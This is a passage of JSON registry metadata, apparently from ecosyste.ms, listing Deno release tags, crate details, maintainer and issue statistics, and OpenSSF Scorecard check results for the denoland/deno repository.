l":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-15T12:42:50.257Z","dependent_packages_count":0,"downloads":80854,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.77467425530659,"dependent_repos_count":22.081976622554567,"dependent_packages_count":29.248628090484342,"stargazers_count":0.003754196655547094,"forks_count":0.05041349794591811,"docker_downloads_count":null,"average":29.231889332589397},"purl":"pkg:cargo/denort_helper","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/denort_helper","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/denort_helper","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/denort_helper/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-15T06:21:26.247Z","issues_count":6571,"pull_requests_count":9583,"avg_time_to_close_issue":17247523.67787189,"avg_time_to_close_pull_request":1538059.59631994,"issues_closed_count":3776,"pull_requests_closed_count":7988,"pull_request_authors_count":562,"issue_authors_count":2451,"avg_comments_per_issue":2.512707350479379,"avg_comments_per_pull_request":0.7153292288427423,"merged_pull_requests_count":6973,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":657,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1387895.1889400922,"past_year_avg_time_to_close_pull_request":1314632.8532110092,"past_year_issues_closed_count":217,"past_year_pull_requests_closed_count":654,"past_year_pull_request_authors_count":170,"past_year_issue_authors_count":367,"past_year_avg_comments_per_issue":1.2146118721461188,"past_year_avg_comments_per_pull_request":1.0591174021648626,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":22,"past_year_merged_pull_requests_count":481,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1776,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":672,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":277,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":188,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"dsherret","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":39,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/denort_helper/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/denort_helper/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/denort_helper/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/denort_helper/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/denort_helper/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/denort_helper/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-04-22T19:56:06.043Z","updated_at":"2025-04-22T19:56:06.043Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-04-16T21:46:22.304Z","updated_at":"2025-04-16T21:46:22.304Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047439,"name":"deno_lib_bindings","ecosystem":"cargo","description":"Official library for deno native bindings","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2019-05-27T17:51:40.651Z","latest_release_published_at":"2019-05-27T17:51:40.651Z","latest_release_number":"0.0.0","last_synced_at":"2026-08-29T21:56:54.551Z","created_at":"2022-04-12T10:00:47.413Z","updated_at":"2026-08-29T21:56:54.552Z","registry_url":"https://crates.io/crates/deno_lib_bindings/","install_command":"cargo install deno_lib_bindings","documentation_url":"https://docs.rs/deno_lib_bindings/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-14T18:00:32.000Z","size":246768,"stargazers_count":108238,"open_issues_count":1496,"forks_count":6339,"subscribers_count":1425,"default_branch":"main","last_synced_at":"2026-08-15T12:07:29.515Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-15T11:22:15.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: 